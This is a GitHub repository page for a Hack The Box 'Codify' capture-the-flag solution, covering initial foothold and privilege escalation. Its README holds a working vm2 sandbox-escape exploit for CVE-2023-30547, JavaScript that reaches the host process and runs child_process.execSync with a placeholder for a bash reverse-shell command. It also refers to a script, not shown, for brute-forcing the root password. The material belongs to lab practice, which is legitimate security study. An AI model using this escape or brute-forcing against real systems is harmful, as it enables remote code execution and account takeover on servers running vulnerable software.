Skip to content
/ HTB-Codify Public

Initial foothold and privilege escalation for HTB Codify

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Af7eR9l0W/HTB-Codify

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 
root_bruteforce.py
root_bruteforce.py
 
 

Repository files navigation

HTB-Codify

Initial foothold and privilege escalation for HTB Codify

Reverse Shell

Based on CVE-2023-30547

Replace PLACEHOLDER with your bash command.

const {VM} = require("vm2");
const vm = new VM();

const code = `
err = {};
const handler = {
    getPrototypeOf(target) {
        (function stack() {
            new Error().stack;
            stack();
        })();
    }
};
  
const proxiedErr = new Proxy(err, handler);
try {
    throw proxiedErr;
} catch ({constructor: c}) {
    c.constructor('return process')().mainModule.require('child_process').execSync('PLACEHOLDER');
}
`

console.log(vm.run(code));

Privilege Escalation

execute root_bruteforce.py to bruteforce root password!

About

Initial foothold and privilege escalation for HTB Codify

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages